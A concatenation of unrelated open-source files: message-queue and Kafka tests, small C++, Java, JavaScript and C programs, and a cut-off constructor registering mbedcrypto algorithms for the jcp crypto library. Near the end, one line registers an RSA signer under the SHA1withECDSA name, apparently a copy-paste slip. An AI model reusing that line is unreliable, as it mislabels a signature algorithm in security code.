        reopen_event = asyncio.Event()
        channel.reopen_callbacks.add(lambda _: reopen_event.set())

        def on_done(*args):
            close_reasons.append(args)
            close_event.set()
            return

        channel.close_callbacks.add(on_done)

        async def run(sleep_time=1):
            await channel.set_qos(1)
            if sleep_time:
                # Deliberately blocks the loop to force the timeout.
                time.sleep(sleep_time)
            await channel.set_qos(0)

        with pytest.raises(asyncio.TimeoutError):
            await asyncio.wait_for(run(), timeout=0.2)
        await close_event.wait()
        with pytest.raises(RuntimeError):
            await channel.channel.closing
        assert channel.is_closed
        # Ensure close callback has been called
        assert close_reasons
        # The robust channel must reopen and then accept operations again.
        await asyncio.wait_for(reopen_event.wait(), timeout=2)
        await asyncio.wait_for(run(sleep_time=0), timeout=2)
class TestCaseAmqpNoConfirmsRobust(TestCaseAmqpNoConfirms):
    # Re-runs the no-publisher-confirms suite against the robust connection
    # (fixtures above switch the factory to connect_robust).
    pass
class TestCaseAmqpWithConfirmsRobust(TestCaseAmqpWithConfirms):
    # Re-runs the publisher-confirms suite against the robust connection.
    pass
|
alamlam1982/fincpp
|
Chapter14/ShapePatterns/13_Proxy/RealAccount.cpp
|
<reponame>alamlam1982/fincpp<gh_stars>0
// RealAccount.cpp
//
// (C) Datasim Education BV 2002
#include "RealAccount.hpp"
// Constructors and destructor
// Default constructor: account starts with a zero balance.
RealAccount::RealAccount() : Account(), bal(0.0)
{
}
// Constructor taking the opening balance.
RealAccount::RealAccount(double balance) : Account(), bal(balance)
{
}
// Copy constructor: copies the base part and the balance.
RealAccount::RealAccount(const RealAccount& source) : Account(source), bal(source.bal)
{
}
RealAccount:: ~RealAccount()
{ // Destructor: no owned resources, nothing to release.
}
// Virtual functions to be define in derived classes
// Withdraws the given amount; throws NoFundsException when the balance
// would go negative.
void RealAccount::Withdraw(double amount)
{
    if (amount > bal)
    {
        throw NoFundsException();
    }
    bal -= amount;
}
double RealAccount::GetBalance()
{ // Return the current balance.
  // NOTE(review): could be declared const, but that requires changing the
  // declaration in RealAccount.hpp as well.
    return bal;
}
// Operator overloading
// Assignment operator: copies the base Account part and the balance.
RealAccount& RealAccount::operator = (const RealAccount& source)
{
    // Guard against self-assignment (standard idiom; also future-proofs the
    // class should it ever manage resources).
    if (this == &source)
    {
        return *this;
    }
    // Call base class assignment
    Account::operator = (source);
    bal = source.bal;
    return *this;
}
|
Montana-Media-Arts/120_CreativeCoding
|
lecture_code/09/06_2d_array_01/sketch.js
|
<gh_stars>100-1000
// define locations of a star:
// each entry is an [x, y] vertex in a small coordinate system that
// draw() scales up by a factor of 10 around the canvas center.
let starArr = [
  [0, -9],
  [7, 9],
  [-9, -2],
  [9, -2],
  [-7, 9]
];
// index of the vertex the next line segment starts from
let idx = 0;
// p5.js setup: full-width canvas, blue background, and a slow frame rate
// (2 fps) so each segment of the star appears step by step.
function setup() {
  createCanvas(windowWidth, 500);
  background(18, 82, 189);
  frameRate(2);
}
// p5.js draw: each frame draws one segment from vertex idx to the next
// vertex (wrapping around), in a random translucent color.
function draw() {
  // move the origin to the canvas center
  translate( width/2, height/2 );
  // create a modulus wrapped plus-one idx
  let idxPlus = (idx + 1) % starArr.length;
  // grab the 2 points defining a line (scaled up by 10)
  let x1 = starArr[idx][0] * 10;
  let y1 = starArr[idx][1] * 10;
  let x2 = starArr[idxPlus][0] * 10;
  let y2 = starArr[idxPlus][1] * 10;
  // draw the line
  strokeWeight(18);
  stroke(random(255), random(255), random(255), 150);
  line(x1, y1, x2, y2);
  // increment the idx (wrapping) for the next frame
  idx = (idx + 1) % starArr.length;
}
|
Wultyc/ISEP_1718_2A2S_REDSI_TrabalhoGrupo
|
REDSI_1160929_1161573/boost_1_67_0/libs/test/doc/examples/dataset_example61.run.cpp
|
// (C) Copyright <NAME> 2014.
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// See http://www.boost.org/libs/test for the library home page.
//[example_code
#define BOOST_TEST_MODULE dataset_example61
#include <boost/test/included/unit_test.hpp>
#include <boost/test/data/test_case.hpp>
#include <boost/test/data/monomorphic.hpp>
namespace data = boost::unit_test::data;
int samples1[] = {1,2};
char const* samples2[] = {"qwerty", "asdfg"};
BOOST_DATA_TEST_CASE(
test1,
data::make(samples1)^samples2,
integer_values,
string_value)
{
std::cout << integer_values << ", " << string_value << std::endl;
}
//]
|
TheWeatherCompany/geomesa
|
geomesa-kafka/geomesa-kafka-datastore/geomesa-kafka-08-datastore/src/test/scala/org/locationtech/geomesa/kafka08/KafkaDataStoreTest.scala
|
<filename>geomesa-kafka/geomesa-kafka-datastore/geomesa-kafka-08-datastore/src/test/scala/org/locationtech/geomesa/kafka08/KafkaDataStoreTest.scala<gh_stars>0
/***********************************************************************
* Copyright (c) 2013-2016 Commonwealth Computer Research, Inc.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Apache License, Version 2.0
* which accompanies this distribution and is available at
* http://www.opensource.org/licenses/apache2.0.php.
*************************************************************************/
package org.locationtech.geomesa.kafka08
import com.typesafe.scalalogging.LazyLogging
import com.vividsolutions.jts.geom.Coordinate
import org.geotools.data._
import org.geotools.data.simple.SimpleFeatureStore
import org.geotools.factory.Hints
import org.geotools.filter.text.ecql.ECQL
import org.geotools.geometry.jts.JTSFactoryFinder
import org.joda.time.DateTime
import org.junit.runner.RunWith
import org.locationtech.geomesa.kafka.{KafkaDataStoreHelper, ReplayConfig}
import org.locationtech.geomesa.kafka.ReplayTimeHelper.ff
import org.locationtech.geomesa.utils.geotools.SimpleFeatureTypes
import org.opengis.filter.Filter
import org.specs2.mutable.Specification
import org.specs2.runner.JUnitRunner
import scala.collection.JavaConversions._
// Integration spec for the Kafka (0.8) GeoMesa data store: exercises schema
// management and producer->consumer feature propagation against an embedded
// Kafka/ZooKeeper.  Timing-sensitive: relies on Thread.sleep for propagation.
@RunWith(classOf[JUnitRunner])
class KafkaDataStoreTest extends Specification with HasEmbeddedKafka with LazyLogging {

  sequential // this doesn't really need to be sequential, but we're trying to reduce zk load

  // skip embedded kafka tests unless explicitly enabled, they often fail randomly
  skipAllUnless(sys.props.get(SYS_PROP_RUN_TESTS).exists(_.toBoolean))

  val gf = JTSFactoryFinder.getGeometryFactory
  val zkPath = "/geomesa/kafka/testds"

  // Parameters for the producer-side store (writes features to Kafka).
  val producerParams = Map(
    "brokers" -> brokerConnect,
    "zookeepers" -> zkConnect,
    "zkPath" -> zkPath,
    "isProducer" -> true)

  "KafkaDataSource" should {
    import org.locationtech.geomesa.security._

    // Consumer-side store: reads the features the producer publishes.
    val consumerParams = Map(
      "brokers" -> brokerConnect,
      "zookeepers" -> zkConnect,
      "zkPath" -> zkPath,
      "isProducer" -> false)

    val consumerDS = DataStoreFinder.getDataStore(consumerParams)
    val producerDS = DataStoreFinder.getDataStore(producerParams)

    "consumerDS must not be null" >> { consumerDS must not(beNull) }
    "producerDS must not be null" >> { producerDS must not(beNull) }

    val schema = {
      val sft = SimpleFeatureTypes.createType("test", "name:String,age:Int,dtg:Date,*geom:Point:srid=4326")
      KafkaDataStoreHelper.createStreamingSFT(sft, zkPath)
    }

    "allow schemas to be created and be available in other data stores" >> {
      producerDS.createSchema(schema)
      consumerDS.getTypeNames.toList must contain("test")
    }

    //todo: This test fails.
    "allow schemas to be created with user-data and be available in other data stores" >> {
      val schemaWithMetadata = {
        val sft = SimpleFeatureTypes.createType("user-data",
          "name:String,age:Int,dtg:Date,*geom:Point:srid=4326;geomesa.foo='bar'")
        KafkaDataStoreHelper.createStreamingSFT(sft, zkPath)
      }
      producerDS.createSchema(schemaWithMetadata)
      consumerDS.getTypeNames.toList must contain("user-data")
      val retrieved = consumerDS.getSchema("user-data")
      retrieved must not(beNull)
      retrieved.getUserData.get("geomesa.foo") mustEqual "bar"
    }.pendingUntilFixed("producerDs has the userData, but consumerDs doesn't. Not seeing in code where sft/usrData is written to zookeeper.")

    "allow schemas to be deleted" >> {
      val replaySFT = KafkaDataStoreHelper.createReplaySFT(schema, ReplayConfig(10000L, 20000L, 1000L))
      val name = replaySFT.getTypeName
      consumerDS.createSchema(replaySFT)
      consumerDS.getTypeNames.toList must contain(name)
      consumerDS.removeSchema(name)
      consumerDS.getTypeNames.toList must not(contain(name))
    }

    // Shared lazy setup: writes one feature through the producer and exposes
    // the feature, store, writer, and consumer feature-collection to the
    // following examples.  Lazy so it runs once, on first use.
    lazy val (sf, store, fw, consumerFC) = {
      // create the consumerFC first so that it is ready to receive features from the producer
      val conFC = consumerDS.getFeatureSource("test")
      val str = producerDS.getFeatureSource("test").asInstanceOf[SimpleFeatureStore]
      val fWriter = producerDS.getFeatureWriter("test", null, Transaction.AUTO_COMMIT)
      val sFeature = fWriter.next()
      sFeature.setAttributes(Array("smith", 30, DateTime.now().toDate).asInstanceOf[Array[AnyRef]])
      sFeature.setDefaultGeometry(gf.createPoint(new Coordinate(0.0, 0.0)))
      sFeature.visibility = "USER|ADMIN"
      fWriter.write()
      Thread.sleep(2000)
      (sFeature, str, fWriter, conFC)
    }

    "read" >> {
      val features = consumerFC.getFeatures.features()
      features.hasNext must beTrue
      val readSF = features.next()
      sf.getID must be equalTo readSF.getID
      sf.getAttribute("dtg") must be equalTo readSF.getAttribute("dtg")
      sf.visibility mustEqual Some("USER|ADMIN")
      store.removeFeatures(ff.id(ff.featureId(sf.getID)))
      Thread.sleep(500) // ensure FC has seen the delete
      consumerFC.getCount(Query.ALL) must be equalTo 0
    }

    "updated" >> {
      val updated = sf
      updated.setAttribute("name", "jones")
      // keep the same feature id so this overwrites rather than inserts
      updated.getUserData.put(Hints.USE_PROVIDED_FID, java.lang.Boolean.TRUE)
      updated.visibility = "ADMIN"
      store.addFeatures(DataUtilities.collection(updated))
      Thread.sleep(500)
      val q = ff.id(updated.getIdentifier)
      val featureCollection = consumerFC.getFeatures(q)
      featureCollection.size() must be equalTo 1
      val res = featureCollection.features().next()
      res.getAttribute("name") must be equalTo "jones"
      res.visibility mustEqual Some("ADMIN")
    }

    "cleared" >> {
      store.removeFeatures(Filter.INCLUDE)
      Thread.sleep(500)
      consumerFC.getCount(Query.ALL) must be equalTo 0
      val sf = fw.next()
      sf.setAttributes(Array("smith", 30, DateTime.now().toDate).asInstanceOf[Array[AnyRef]])
      sf.setDefaultGeometry(gf.createPoint(new Coordinate(0.0, 0.0)))
      fw.write()
      Thread.sleep(500)
      consumerFC.getCount(Query.ALL) must be equalTo 1
    }

    "queried with cql" >> {
      val sf = fw.next()
      sf.setAttributes(Array("jones", 60, DateTime.now().toDate).asInstanceOf[Array[AnyRef]])
      sf.setDefaultGeometry(gf.createPoint(new Coordinate(0.0, 0.0)))
      sf.visibility = "USER"
      fw.write()
      Thread.sleep(500)
      var res = consumerFC.getFeatures(ff.equals(ff.property("name"), ff.literal("jones")))
      res.size() must be equalTo 1
      val resSF = res.features().next()
      resSF.getAttribute("name") must be equalTo "jones"
      resSF.visibility mustEqual Some("USER")
      res = consumerFC.getFeatures(ff.greater(ff.property("age"), ff.literal(50)))
      res.size() must be equalTo 1
      res.features().next().getAttribute("name") must be equalTo "jones"
      // bbox and cql
      val spatialQ = ff.bbox("geom", -10, -10, 10, 10, "EPSG:4326")
      val attrQ = ff.greater(ff.property("age"), ff.literal(50))
      res = consumerFC.getFeatures(ff.and(spatialQ, attrQ))
      res.size() must be equalTo 1
      res.features().next().getAttribute("name") must be equalTo "jones"
      // same predicates expressed as ECQL text, with the clauses in varying order
      val mixedQ = ECQL.toFilter("age = 60 AND INTERSECTS(geom, POLYGON((-10 -10, 10 -10, 10 10, -10 10, -10 -10))) " +
        "AND bbox(geom, -10, -10, 10, 10)")
      res = consumerFC.getFeatures(mixedQ)
      res.size() must be equalTo 1
      res.features().next().getAttribute("name") must be equalTo "jones"
      val mixedQ2 = ECQL.toFilter("bbox(geom, -10, -10, 10, 10) AND age = 60 AND " +
        "INTERSECTS(geom, POLYGON((-10 -10, 10 -10, 10 10, -10 10, -10 -10)))")
      res = consumerFC.getFeatures(mixedQ2)
      res.size() must be equalTo 1
      res.features().next().getAttribute("name") must be equalTo "jones"
      val mixedQ3 = ECQL.toFilter("bbox(geom, -150, -10, 31, 10) AND age = 60 AND " +
        "INTERSECTS(geom, POLYGON((-10 -10, 10 -10, 10 10, -10 10, -10 -10)))")
      res = consumerFC.getFeatures(mixedQ3)
      res.size() must be equalTo 1
      res.features().next().getAttribute("name") must be equalTo "jones"
      val mixedQ4 = ECQL.toFilter("name in ('jones') AND " +
        "INTERSECTS(geom, POLYGON((-180 -90, -180 90, 180 90, 180 -90, -180 -90))) AND " +
        "bbox(geom, -10, -10, 10, 10)"
      )
      res = consumerFC.getFeatures(mixedQ4)
      res.size() must be equalTo 1
      res.features().next().getAttribute("name") must be equalTo "jones"
    }

    "allow for calls to getFeatureWriterAppend" >> {
      producerDS.getFeatureWriterAppend(schema.getTypeName, Transaction.AUTO_COMMIT) must not(beNull)
    }

    "return correctly from canProcess" >> {
      import KafkaDataStoreFactoryParams._
      val factory = new KafkaDataStoreFactory
      factory.canProcess(Map.empty[String, Serializable]) must beFalse
      factory.canProcess(Map(KAFKA_BROKER_PARAM.key -> "test", ZOOKEEPERS_PARAM.key -> "test")) must beTrue
    }
  }

  // Tear down the embedded Kafka/ZooKeeper after all examples have run.
  step {
    shutdown()
  }
}
|
jriwanek/Mantle
|
src/main/java/slimeknights/mantle/network/NetworkWrapper.java
|
package slimeknights.mantle.network;
import net.minecraftforge.fml.common.network.NetworkRegistry;
import net.minecraftforge.fml.common.network.simpleimpl.IMessage;
import net.minecraftforge.fml.common.network.simpleimpl.IMessageHandler;
import net.minecraftforge.fml.common.network.simpleimpl.MessageContext;
import net.minecraftforge.fml.common.network.simpleimpl.SimpleNetworkWrapper;
import net.minecraftforge.fml.relauncher.Side;
/**
 * A small network implementation/wrapper using AbstractPackets instead of IMessages.
 * Instantiate in your mod class and register your packets accordingly.
 * <p>
 * Registration order matters: each packet class receives the next sequential
 * discriminator id, so client and server must register packets in the same order.
 */
public class NetworkWrapper {

  /** The underlying Forge channel all packets are sent/received through. */
  public final SimpleNetworkWrapper network;
  // NOTE(review): "Abstact" is a typo for "Abstract", but both the field and
  // the nested class are (package-)visible API, so renaming would break callers.
  protected final AbstactPacketHandler handler;
  /** Discriminator id assigned to the next registered packet class. */
  private int id = 0;

  public NetworkWrapper(String channelName) {
    network = NetworkRegistry.INSTANCE.newSimpleChannel(channelName);
    handler = new AbstactPacketHandler();
  }

  /**
   * Packet will be received on both client and server side.
   */
  public void registerPacket(Class<? extends AbstractPacket> packetClazz) {
    // Registers the same class twice, consuming two discriminator ids
    // (one per side).
    registerPacketClient(packetClazz);
    registerPacketServer(packetClazz);
  }

  /**
   * Packet will only be received on the client side
   */
  public void registerPacketClient(Class<? extends AbstractPacket> packetClazz) {
    registerPacketImpl(packetClazz, Side.CLIENT);
  }

  /**
   * Packet will only be received on the server side
   */
  public void registerPacketServer(Class<? extends AbstractPacket> packetClazz) {
    registerPacketImpl(packetClazz, Side.SERVER);
  }

  private void registerPacketImpl(Class<? extends AbstractPacket> packetClazz, Side side) {
    network.registerMessage(handler, packetClazz, id++, side);
  }

  /** Dispatches incoming packets to their client- or server-side handler. */
  public static class AbstactPacketHandler implements IMessageHandler<AbstractPacket, IMessage> {

    @Override
    public IMessage onMessage(AbstractPacket packet, MessageContext ctx) {
      // Side is taken from the message context, so one handler instance
      // serves both directions.
      if(ctx.side == Side.SERVER) {
        return packet.handleServer(ctx.getServerHandler());
      }
      else {
        return packet.handleClient(ctx.getClientHandler());
      }
    }
  }
}
|
LiveTyping/CannyViewAnimator
|
library/src/main/java/com/livetyping/library/animators/reveal/RevealAnimators.java
|
<reponame>LiveTyping/CannyViewAnimator<gh_stars>100-1000
package com.livetyping.library.animators.reveal;
import android.animation.Animator;
import android.annotation.SuppressLint;
import android.annotation.TargetApi;
import android.os.Build;
import android.view.Gravity;
import android.view.View;
import com.livetyping.library.interfaces.DefaultCannyAnimators;
import com.livetyping.library.interfaces.InAnimator;
import com.livetyping.library.interfaces.OutAnimator;
/**
 * Predefined circular-reveal in/out animator pairs, one per anchor position
 * (the {@link Gravity} combination passed to each {@link RevealIn}/{@link RevealOut}
 * determines where the reveal circle originates).
 * <p>
 * Created by Danil on 09.05.2016.
 */
@SuppressLint("RtlHardcoded")
@TargetApi(Build.VERSION_CODES.LOLLIPOP)
public enum RevealAnimators implements DefaultCannyAnimators {

    CIRCULAR_REVEAL_TOP_CENTER(new RevealIn(Gravity.TOP | Gravity.CENTER_HORIZONTAL),
            new RevealOut(Gravity.TOP | Gravity.CENTER_HORIZONTAL)),
    CIRCULAR_REVEAL_TOP_LEFT(new RevealIn(Gravity.TOP | Gravity.LEFT),
            new RevealOut(Gravity.TOP | Gravity.LEFT)),
    CIRCULAR_REVEAL_TOP_RIGHT(new RevealIn(Gravity.TOP | Gravity.RIGHT),
            new RevealOut(Gravity.TOP | Gravity.RIGHT)),
    CIRCULAR_REVEAL_BOTTOM_CENTER(new RevealIn(Gravity.BOTTOM | Gravity.CENTER_HORIZONTAL),
            new RevealOut(Gravity.BOTTOM | Gravity.CENTER_HORIZONTAL)),
    CIRCULAR_REVEAL_BOTTOM_LEFT(new RevealIn(Gravity.BOTTOM | Gravity.LEFT),
            new RevealOut(Gravity.BOTTOM | Gravity.LEFT)),
    CIRCULAR_REVEAL_BOTTOM_RIGHT(new RevealIn(Gravity.BOTTOM | Gravity.RIGHT),
            new RevealOut(Gravity.BOTTOM | Gravity.RIGHT)),
    CIRCULAR_REVEAL_CENTER_LEFT(new RevealIn(Gravity.LEFT | Gravity.CENTER_VERTICAL),
            new RevealOut(Gravity.LEFT | Gravity.CENTER_VERTICAL)),
    CIRCULAR_REVEAL_CENTER_RIGHT(new RevealIn(Gravity.RIGHT | Gravity.CENTER_VERTICAL),
            new RevealOut(Gravity.RIGHT | Gravity.CENTER_VERTICAL)),
    CIRCULAR_REVEAL_CENTER(new RevealIn(Gravity.CENTER),
            new RevealOut(Gravity.CENTER));

    // Delegates for the enter and exit animations of this anchor position.
    private InAnimator inAnimator;
    private OutAnimator outAnimator;

    RevealAnimators(InAnimator inAnimator,
                    OutAnimator outAnimator) {
        this.inAnimator = inAnimator;
        this.outAnimator = outAnimator;
    }

    @Override
    public String getName() {
        return name();
    }

    @Override
    public Animator getInAnimator(View inChild, View outChild) {
        return inAnimator.getInAnimator(inChild, outChild);
    }

    @Override
    public Animator getOutAnimator(View inChild, View outChild) {
        return outAnimator.getOutAnimator(inChild, outChild);
    }
}
|
krattai/AEBL
|
blades/gnunet/src/nse/gnunet-nse.c
|
/*
This file is part of GNUnet
Copyright (C) 2008--2014, 2016 GNUnet e.V.
GNUnet is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 3, or (at your
option) any later version.
GNUnet is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with GNUnet; see the file COPYING. If not, write to the
Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1301, USA.
*/
/**
* @file nse/gnunet-nse.c
* @brief Program to display network size estimates from the NSE service
* @author <NAME> <<EMAIL>>
*/
#include "platform.h"
#include "gnunet_nse_service.h"
/**
* The handle to the NSE service
*/
static struct GNUNET_NSE_Handle *nse;
/**
* The program status; 0 for success.
*/
static int status;
/**
 * Shutdown task: disconnect from the NSE service if the handle
 * is still open and clear it so the cleanup is idempotent.
 *
 * @param cls NULL (unused)
 */
static void
do_shutdown (void *cls)
{
  if (NULL == nse)
    return;
  GNUNET_NSE_disconnect (nse);
  nse = NULL;
}
/**
 * Callback invoked by the NSE service each time the network size
 * estimate is updated.  Prints one line to stdout with four columns:
 * timestamp in microseconds, estimated peer count (derived from the
 * logarithmic estimate), the raw logarithmic estimate, and its standard
 * deviation.  Receiving at least one estimate marks the program run as
 * successful (status = 0).
 *
 * @param cls NULL
 * @param timestamp server timestamp of the estimate
 * @param estimate the value of the current network size estimate
 *                 (logarithmic; converted to a peer count via
 *                 GNUNET_NSE_log_estimate_to_n for the second column)
 * @param std_dev standard deviation (rounded down to nearest integer)
 *                of the size estimation values seen
 */
static void
handle_estimate (void *cls,
                 struct GNUNET_TIME_Absolute timestamp,
                 double estimate,
                 double std_dev)
{
  status = 0;
  FPRINTF (stdout, "%llu %f %f %f\n",
           (unsigned long long) timestamp.abs_value_us,
           GNUNET_NSE_log_estimate_to_n (estimate),
           estimate,
           std_dev);
}
/**
 * Actual main function that runs the emulation.
 *
 * Connects to the NSE service, routing size-estimate updates to
 * handle_estimate(), and registers do_shutdown() so the service handle
 * is released when the scheduler shuts down.
 *
 * @param cls unused
 * @param args remaining args, unused
 * @param cfgfile name of the configuration
 * @param cfg configuration handle
 */
static void
run (void *cls,
     char *const *args,
     const char *cfgfile,
     const struct GNUNET_CONFIGURATION_Handle *cfg)
{
  nse = GNUNET_NSE_connect (cfg,
                            &handle_estimate,
                            NULL);
  GNUNET_SCHEDULER_add_shutdown (&do_shutdown,
                                 NULL);
}
/**
 * Main function.
 *
 * @param argc number of command-line arguments
 * @param argv command-line arguments
 * @return 0 on success (at least one estimate received),
 *         1 if no estimate arrived, 2 if the program failed to start
 */
int
main (int argc,
      char *const *argv)
{
  struct GNUNET_GETOPT_CommandLineOption options[] = {
    GNUNET_GETOPT_OPTION_END
  };
  int ret;

  /* Assume failure until handle_estimate() reports a value. */
  status = 1;
  ret = GNUNET_PROGRAM_run (argc,
                            argv,
                            "gnunet-nse",
                            gettext_noop ("Show network size estimates from NSE service."),
                            options,
                            &run,
                            NULL);
  if (GNUNET_OK != ret)
    return 2;
  return status;
}
|
jc-lab/jcp
|
provider/mbedcrypto/src/mbedcrypto_provider.cpp
|
<filename>provider/mbedcrypto/src/mbedcrypto_provider.cpp
/**
* @file mbedcrypto_provider.cpp
* @author Jichan (<EMAIL> / http://ablog.jc-lab.net/ )
* @date 2019/07/19
* @copyright Copyright (C) 2019 jichan.\n
* This software may be modified and distributed under the terms
* of the Apache License 2.0. See the LICENSE file for details.
*/
#include <jcp/security.hpp>
#include "jcp/mbedcrypto_provider.hpp"
#include "jcp/cipher_algo.hpp"
#include "jcp/message_digest_algo.hpp"
#include "jcp/mac_algo.hpp"
#include "jcp/key_agreement_algo.hpp"
#include "jcp/signature_algo.hpp"
#include "jcp/secret_key_factory_algo.hpp"
#include "jcp/key_factory_algo.hpp"
#include "jcp/key_pair_algo.hpp"
#include "mbedcrypto_securerandom.hpp"
#include "mbedcrypto_cipher_sym.hpp"
#include "mbedcrypto_cipher_asym.hpp"
#include "mbedcrypto_md.hpp"
#include "mbedcrypto_ka_ecdh.hpp"
#include "mbedcrypto_sign.hpp"
#include "jcp/mbedcrypto_key_utils.hpp"
#include "mbedcrypto_key_factory.hpp"
#include "mbedcrypto_key_pair_generator.hpp"
#include <jcp/soft/soft_pbkdf2_skf.hpp>
#include <jcp/soft/soft_hkdf_skf.hpp>
#include <mbedtls/cipher.h>
namespace jcp {
    // Registers a fresh MbedcryptoProvider with the global Security registry.
    // NOTE(review): the 'security' parameter is ignored; registration always goes
    // through the static Security::addProvider() — confirm this is intentional.
    void MbedcryptoProvider::registerTo(Security *security) {
        jcp::Security::addProvider(std::make_unique<MbedcryptoProvider>());
    }
MbedcryptoProvider::MbedcryptoProvider()
{
setSecureRandomFactory(std::make_unique<mbedcrypto::MbedcryptoSecureRandomFactory>(this));
setKeyUtils(std::make_unique<mbedcrypto::MbedcryptoKeyUtils>(this));
addCipherAlgorithm(&CipherAlgorithm::AesEcbNoPadding, std::unique_ptr<mbedcrypto::MbedcryptoSymCipherFactory>(new mbedcrypto::MbedcryptoSymCipherFactory(this, true, {
{128, MBEDTLS_CIPHER_AES_128_ECB},
{192, MBEDTLS_CIPHER_AES_192_ECB},
{256, MBEDTLS_CIPHER_AES_256_ECB}
})));
addCipherAlgorithm(&CipherAlgorithm::AesCbcNoPadding, std::unique_ptr<mbedcrypto::MbedcryptoSymCipherFactory>(new mbedcrypto::MbedcryptoSymCipherFactory(this, true, {
{128, MBEDTLS_CIPHER_AES_128_CBC},
{192, MBEDTLS_CIPHER_AES_192_CBC},
{256, MBEDTLS_CIPHER_AES_256_CBC}
})));
addCipherAlgorithm(&CipherAlgorithm::AesGcmNoPadding, std::unique_ptr<mbedcrypto::MbedcryptoSymCipherFactory>(new mbedcrypto::MbedcryptoSymCipherFactory(this, true, {
{128, MBEDTLS_CIPHER_AES_128_GCM},
{192, MBEDTLS_CIPHER_AES_192_GCM},
{256, MBEDTLS_CIPHER_AES_256_GCM}
})));
addCipherAlgorithm(&CipherAlgorithm::RsaEcbOaepPadding, std::make_unique<mbedcrypto::MbedcryptoAsymCipherFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_RSA_PKCS_V21));
mbedcrypto::MbedcryptoMessageDigestFactory* sha1Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA1);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_1, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha1Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha224Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA224);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_224, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha224Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha256Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA256);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_256, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha256Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha384Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA384);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_384, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha384Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha512Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA512);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_512, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha512Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha1Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA1);
addMacAlgorithm(&MacAlgorithm::HmacSHA1, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha1Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha224Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA224);
addMacAlgorithm(&MacAlgorithm::HmacSHA224, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha224Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha256Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA256);
addMacAlgorithm(&MacAlgorithm::HmacSHA256, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha256Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha384Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA384);
addMacAlgorithm(&MacAlgorithm::HmacSHA384, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha384Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha512Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA512);
addMacAlgorithm(&MacAlgorithm::HmacSHA512, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha512Factory));
addKeyAgreementAlgorithm(&KeyAgreementAlgorithm::ECDH, std::make_unique<mbedcrypto::MbedcryptoKaEcdhFactory>(this));
addSignatureAlgorithm(&SignatureAlgorithm::NONEwithECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_NONE, nullptr));
addSignatureAlgorithm(&SignatureAlgorithm::SHA1withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA1, sha1Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA224withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA224, sha224Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA256withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA256, sha256Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA384withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA384, sha384Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA512withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA512, sha512Factory));
addSignatureAlgorithm(&SignatureAlgorithm::NONEwithRSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_NONE, nullptr));
addSignatureAlgorithm(&SignatureAlgorithm::SHA1withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA1, sha1Factory));
